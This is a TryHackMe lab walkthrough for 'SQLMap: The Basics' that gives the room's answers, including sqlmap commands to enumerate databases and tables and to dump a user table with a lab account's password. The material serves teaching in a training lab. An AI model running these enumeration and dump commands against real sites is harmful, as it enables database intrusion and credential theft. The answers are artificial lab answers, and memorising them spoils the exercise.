
SQLMap: The Basics | Try Hack Me writeup / walkthrough

Task 1 - Introduction


Q1. Which language builds the interaction between a website and its database?


Answer šŸ‘‰ sql

Task 2 - SQL Injection Vulnerability


Q1. Which boolean operator checks if at least one side of the operator is true for the condition to be true?


Answer šŸ‘‰ or

Q2. Is 1=1 in an SQL query always true? (YEA/NAY)

Answer šŸ‘‰ YEA

Task 3 - Automated SQL Injection Tool


Q1. Which flag in the SQLMap tool is used to extract all the databases available?


Answer šŸ‘‰ --dbs

Q2. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)

  • Let's build the command from given question.
  • Using -u flag for the url and -D with given table name and --tables for enumerating table names.

Answer šŸ‘‰ sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables

Task 4 - Practical Exercise


Q1. How many databases are available in this web application?

  • After visiting on given url , A login page appear similar like following :
login page
  • After putting a random data and inspecting the network tab, then clicking on submit gives a get url where data is being send.
inspecting network
  • Let's build the command.
  • It's a time based sql injection , you have to wait because it depends upon the bandwith and your internet speed.
sqlmap -u "" --dbs --level=5

Answer šŸ‘‰ 6

Q2. What is the name of the table available in the "ai" database?

  • Now we know the name of database , following command can help you to enumerate the tables.
sqlmap -u "" -D ai --tables

Answer šŸ‘‰ user

Q3. What is the password of the email test@chatai.com?

  • Now we know the table name and database name.
  • Following command can help you to dump all the entries that are in the given table.
sqlmap -u "" -D ai -T user --dump

Answer šŸ‘‰ 12345678